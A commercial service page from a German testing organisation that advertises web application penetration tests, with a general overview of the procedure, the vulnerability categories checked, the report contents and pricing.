Web Application Security

Web Pentest

Penetration tests for web applications and background systems

If web applications and background systems are not adequately protected, they are at risk of becoming targets for potential hacker attacks. These attacks jeopardize sensitive customer data and internal company networks. With the help of customized penetration tests (pentests), we support you in securing your web applications and background systems against cyberattacks and data theft.

Ein Mann sitz an einem Schreibtisch mit zwei Bildschirmen und analysiert Daten.

Best possible protection for your web ap

Through penetration tests, we uncover vulnerabilities and potential security gaps in your web application and background system before others do.

Testing at system and network level

Using port and vulnerability scans, we also check the security of the underlying backend system (web server) of the web application.

Documentation & recommendations for acti

You receive all the results in the form of a detailed and informative test report, including appropriate recommendations for action to eliminate weak points.

What is a Web Pentest?

Web pentesting (web application penetration testing) is an IT security measure used to check the security of web applications.

The aim is to uncover existing security vulnerabilities and possible points of attack in the web application and to increase the security of the web application in this way. Methods and means are used that real attackers would also use.

Your benefits at a glance

Penetration tests for secure web applications

Secure web applications are essential for protecting sensitive data and safeguarding business-critical processes. Penetration tests specifically uncover vulnerabilities and thus help to minimise security risks at an early stage.

One step ahead of attackers
Pentests identify security gaps and vulnerabilities before criminals can exploit them for their own purposes.
Pentests based on recognised standards
Our experts test the security of your web application according to recognised standards and guidelines.
Security at all web application levels
In addition to the frontend, our experts also check the security of the backend system (web server).
Continuous improvement
Penetration tests help you uncover potential improvements to your web application.

Increase IT security, minimise risks
Pentests help you to improve the security of your web application & reduce the risk of attacks.
Trust with customers & business partners
An independent security analysis of your web application strengthens the trust of your customers & business partners.
Focus on your day-to-day business
Focus on your business while our experts scrutinise your application.
Protection against financial & reputational damage
Prevention instead of rehabilitation: Pentests help you prevent attacks - and the associated damage.

Procedure for a pentest against a web application

1

Preparation & Kickoff

Clarification of technical and organisational features and requirements.

2

Information gathering & analysis

Determination of basic information about the test object.

3

Carrying out penetration tests

Analysis of the selected web application based on the information collected.

4

Final report

Summary of all results of the audit in the form of a final report.

5

Optional: Re-test

Check whether the implemented improvement and defence measures are (effective).

We will support you – no matter what

Get started at last!

We advise you

TÜV NORD IT Secure Communication I Berlin

To the consulting services Contact us

Goal achieved?

We check that

TÜV Informationstechnik I Essen

To the test offers Contact us

This is being investigated.

As part of penetration tests (including backend systems, web services, and APIs), the respective web application is examined for the most critical or most frequently exploited security risks.

Access control (authorisation) / client separation: If access rights for authenticated users are not implemented correctly, attackers may be able to access functions or data of other users. This also includes cross-client access.

Input & output validation: If user input data is not sufficiently validated, injection vulnerabilities (e.g. cross-site scripting (XSS), XML External Entities (XXE), SQL injection) can lead to data loss, corruption or system takeover (remote code execution), among other things. Targeted injection attacks attempt to smuggle malicious code into the application.

Security-related misconfiguration / hardening: By using components with known vulnerabilities, standard accounts, unused (sample, test) pages or misconfigurations etc., it may be possible to gain unauthorised access to sensitive information or the underlying system (web server).

Disclosure of security-relevant information (information gathering/disclosure): Websites and responses from web applications and web services can contain security-relevant information (e.g. version details), which attackers can use to bypass security mechanisms and exploit vulnerabilities.

Investigations at network level: The penetration test includes a check at network level of the web application's web server (an IP address). Portscans, a check of the SSL/TLS configuration and vulnerability scans are carried out.

Authentication / session management: Errors in authentication and session management may allow attackers to assume the identity of other users, e.g. by means of brute force attacks, weak session IDs or the use of insecure passwords.

Data security: It must be ensured that the web application is configured in such a way that access is only possible via the intended, secure/encrypted communication paths. Access to resources and functions that are not required must therefore be restricted (e.g. using cookie flags, HTTP security headers).

Business/application logic: In the case of multi-level mapped business processes, care must be taken to ensure that the implemented application logic cannot be misused (e.g. breaking out of an intended registration process).

Cryptography / SSL and TLS: If there are vulnerabilities in the SSL/TLS configuration, the probability increases that potential attackers can read transmitted data (confidentiality), manipulate it (integrity) and impersonate a legitimate trusted party/service without authorisation (authenticity) and thus successfully carry out man-in-the-middle attacks, for example.

Data protection: In addition to technical checks, the web application (incl. background system) can also be checked for data protection aspects, e.g. implementation of privacy by design, fulfilment of data protection principles, etc.

Frequently Asked Questions (FAQ)

What you need to know about web pentests

The test report is always prepared by our experts individually and in an easily understandable form (no automatic generation) and contains at least the following information:

Introduction: Brief description of the test object, objective of the pentest and documentation of special features during the investigation.
Management/Executive Summary: Summary of the results and assessment of the general safety level.
Risk assessment: Assignment of a risk level to each vulnerability (informative, low, medium, high or critical risk), which describes the criticality of the respective vulnerability.
Clear presentation: Clear presentation of all identified vulnerabilities in a table as well as in a risk beam, which shows the number of vulnerabilities per risk level.
Detailed description of vulnerabilities & proof-of-concept: For each vulnerability, there is an individual description that shows exactly how the vulnerability was found and how it can be exploited by an attacker (proof-of-concept).
Evaluation of automated tests: The results of the automated tests are evaluated by the TÜV IT security experts, checked for false positives and then summarised in the report.
Recommendation of measures to eliminate the vulnerability: For each vulnerability, there is a recommendation of measures to eliminate the vulnerability.
References: If available, we provide references to vulnerability databases (e.g. CVE).
Technical attachments : If available, further information and files on the tests carried out are provided as attachments, e.g. the raw results of the port and vulnerability scans.

Black box
Pentest without additional information
Grey box (standard)
Pentest with additional information, e.g. test access data and (API) documentation
White box
Pentest with additional information, e.g. architecture/design documents, communication matrix or source code in addition to test access data

The approach of the TÜVIT security experts is based on the OWASP Application Security Verification Standard (ASVS)which describes basic security requirements for web applications and background systems and the OWASP Web Security Testing Guide (WSTG)which describes how the requirements from the ASVS can be verified. Furthermore, the OWASP Top 10 Vulnerabilities for Web Applications and the implementation concept for penetration tests from the BSIand finally the OWASP Nest Practices approach

The costs depend on the complexity of the test object. A spot check is in the lower to mid four-figure range. For an exact price indication, we need more information about your web application and your background system.

The duration of the test depends on the type of test selected (Level 1 to 3), see above. Deviating from the test period, a period of at least 1 week is assumed for the Spot Check (Level 1) and at least 2 weeks for the Regular (Level 2) and Advanced (Level 3) pentest.